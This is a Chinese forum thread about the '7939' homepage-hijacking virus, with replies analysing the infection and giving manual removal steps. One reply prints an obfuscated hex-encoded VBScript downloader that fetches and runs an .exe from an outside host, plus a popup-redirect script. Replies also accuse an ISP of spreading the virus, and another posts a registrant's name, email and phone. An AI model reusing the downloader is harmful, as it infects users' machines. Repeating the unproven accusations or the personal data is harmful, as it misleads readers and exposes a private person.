首页被锁定7939
发布网友
发布时间:2022-10-13 20:21
共6个回答
热心网友
时间:2023-11-11 15:00
相信很多人都受到过7939这个病毒的毒害,此病毒强行把用户IE默认首页强行锁定为www.7939.COM这个网站,并在内存中驻留realplayer.exe进程(伪装成realplay这个软件,realplay是网络最常用的软件之一,用于播放网络中流行的流媒体格式rm、rmvb等),此进程在windows正常模式中不能杀掉,病毒文件隐藏在系统system32目录下,对于此病毒的介绍我在这里不详细说了,www.hao123.com已经在他们首页做了此病毒的专栏介绍,大家有兴趣可以去看。
这几天看到大家都在谈论7939病毒,因此也特别留意,为此我特意关闭了浏览器的弹出窗口拦截功能,今天打开一个平时经常上的网站,却发现弹出2个窗口,分别是:http://www.w.com/web/13.htm及http://www.w.com/web/12.htm(请大家不要点击这2个页面),察看这2个页面的原代码,发现有可疑代码如下:
以下内容为程序代码:
<script language="VBScript"> S="6F6E206572726F7220726573756D65206E6578740D0A6375726C203D2022687474703A2F2F7169646F6E672E7669727573736B792E636F6D2F7169646F6E672E657865220D0A536574206466203D20646F63756D656E742E637265617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336220D0A7374723D224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D22737472220D0A43343D2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D0A782E4F70656E20737472362C204355726C2C2046616C73650D0A782E53656E640D0A666E616D65313D22616E38352E636F6D220D0A7365742046203D2064662E6372656174656F626A6563742822536372697074696E672E46696C6553797374656D4F626A656374222C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531290D0A532E6F70656E0D0A532E777269746520782E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A7365742051203D2064662E6372656174656F626A65637428225368656C6C2E4170706C69636174696F6E222C2222290D0A512E5368656C6C4578656375746520666E616D65312C22222C22222C226F70656E222C30":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5) LOOP:EXECUTE D </script>
相信这个就是让大家感染上7939病毒的页面,而放病毒的网站就是www.w.com(嘟嘟网),找到放病毒的页面了,但是它怎么会弹出呢?我察看了系统IE临时文件夹,发现了http://www.94lm.com/w.html,此页面代码如下:
以下内容为程序代码:
<Script Lang="JavaScript"> function getCookie (name) { var CookieFound = false; var start = 0; var end = 0; var CookieString = document.cookie; var i = 0; while (i <= CookieString.length) { start = i ; end = start + name.length; if (CookieString.substring(start, end) == name){ CookieFound = true; break; } i++; } if (CookieFound){ start = end + 1; end = CookieString.indexOf(";",start); if (end < start) end = CookieString.length; return unescape(CookieString.substring(start, end)); } return ""; } var tmp=getCookie(""); var expires = new Date(); expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000); if(tmp==11) { window.opener='tmp'; window.close(); } else { if(tmp==10) { document.cookie = '=11;expires=' + expires.toGMTString(); window.location='http://www.w.com/web/13.htm'; } else { window.open("http://www.w.com/web/13.htm"); document.cookie = '=10;expires=' + expires.toGMTString(); window.location='http://www.w.com/web/12.htm'; } } </Script>
作者: 222.137.231.* 2006-9-3 23:31 回复此发言
--------------------------------------------------------------------------------
6 回复:要求关了w.com(嘟嘟网)!!!
这段代码的用处就是弹出http://www.w.com/web/12.htm,http://www.w.com/web/12.htm这2个页面,而前面已经介绍过,94lm.com这个站是由ISP控制弹出的网站,也可以说94lm.com和ISP有非常密切的关系,而这个站弹出的却是2个病毒页面。
现在事情明朗了,ISP强制用户访问http://www.94lm.com/w.html,而通过此页面弹出2个病毒页面:http://www.w.com/web/12.htm,http://www.w.com/web/12.htm,原来7939病毒的始作俑者居然是ISP。
一个有趣的现象,相信大家都知道HAO123(网址导航)被百度收购,而www.7939.COM也是网址导航站,7939病毒的泛滥直接影响了HAO123(其实也就是百度公司),强行抢走HAO123的用户,因此HAO123在首页的显著位置做了对此病毒的专门介绍及清除办法,可笑的是百度公司却不知道抢他用户的竟是ISP,百度何时才能反应过来呢?如何和这样巨头斗,以维护自己的利益?
接着写。。。。
我们安装宽带网络的时候,都要和ISP签订一个合约,根据我的记忆,似乎在合约中并没有强制让用户看广告的条款(请有心人核实下),我们花钱上网,却被强制浏览他们的广告页面,更可气的是居然还有病毒,这就是所谓的服务吗?我们的权益谁来保障?
补充材料:
一、ISP:电信、网通这些提供网络服务的公司就是ISP。
二、94lm,365tan和ISP关系的证明材料。
94lm和365tan是同一个网站
经查该站点于2005-12-22 13:26:05 注册
注册人:WEI QIU MIN
地址:北京海淀区学清路8号
邮编:100084
邮箱:jason.wei@lvxin.com.cn
电话:010-82730588
背景:此人与 北京电信通绿信科技有限公司 有某种关系,而此公司
的服务宗旨居然是“屏蔽不良或不当网站,清除网上有害信息”,
可笑啊!该公司的地址如图所贴
www.lvxin.com.cn是“绿信科技”,和“紫光绿信”那个王八蛋公司名字怎么这么像?
看了一下绿信科技的网站,其主要产品电信级AR2000-S的关键特性里面第一项是
引用:
AR2000-S独特的旁路(Pass-by)监听技术无需改变现有网络结构和其它系统设置,不会导致网络流量的下降,不会成为网络的瓶颈,不会降低网络效率,完全适合运营商级应用。
在典型业务中,最后一项是
引用:
利用AR2000-S系统可以在用户上网浏览时向用户的屏幕主动推送各类信息,例如系统调整通知、业务宣传、欠费催告、以及广告等信息内容。可以任意设定发布的范围、时间、频率等,成为运营商发布信息和宣传业务的最佳手段。
热心网友
时间:2023-11-11 15:01
热心网友
时间:2023-11-11 15:01
热心网友
时间:2023-11-11 15:02
运行realplayer.exe 后
发现在C:\windows\system32下生成了realplayer.exe和brlmon.dll(RavMon.dll)两个文件 且brlmon.dll(RavMon.dll)插入Explorer进程 还好插入的是Explorer进程 比较好弄
两个东西相互监视 所以即便结束了 realplayer.exe进程 也无法删除这个文件
并且在注册表项上添加了2个启动项
O4 - HKCU\..\Run: [Realplayer.exe] C:\WINDOWS\system32\Realplayer.exe
O4 - 启动项HKLM\\Run: [Realplayer.exe] C:\WINDOWS\system32\Realplayer.exe
达到开机启动的目的
清除方法如下:
1。
控制面版-文件夹选项-查看-显示系统文件夹的内容和显示所有文件和文件夹 勾上
打开任务管理器 结束Realplayer.exe
然后结束 Explorer进程
此时桌面可能没了 不要担心
然后点击任务管理器上方的菜单栏中的 文件-新建任务-浏览 找到
C:\WINDOWS\system32\Realplayer.exe和C:\WINDOWS\system32\brlmon.dll 或者C:\WINDOWS\System32\RavMon.dll右键删除该文件
然后文件-新建任务-浏览 打开C:\Windows\Explorer.exe 此时 桌面又回来了
结束Explorer.exe是为了删除那个C:\WINDOWS\system32\brlmon.dll(C:\WINDOWS\System32\RavMon.dll) 否则删不掉
2。
. 删除病毒添加的启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Realplayer.exe"="%System%\Realplayer.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Realplayer.exe"="%System%\Realplayer.exe"
3。
删除病毒添加的注册表信息:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft NT]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RunDown]
4。
修改主页
热心网友
时间:2023-11-11 15:02
http://www.353000.com/killingvirus.html
热心网友
时间:2023-11-11 15:03
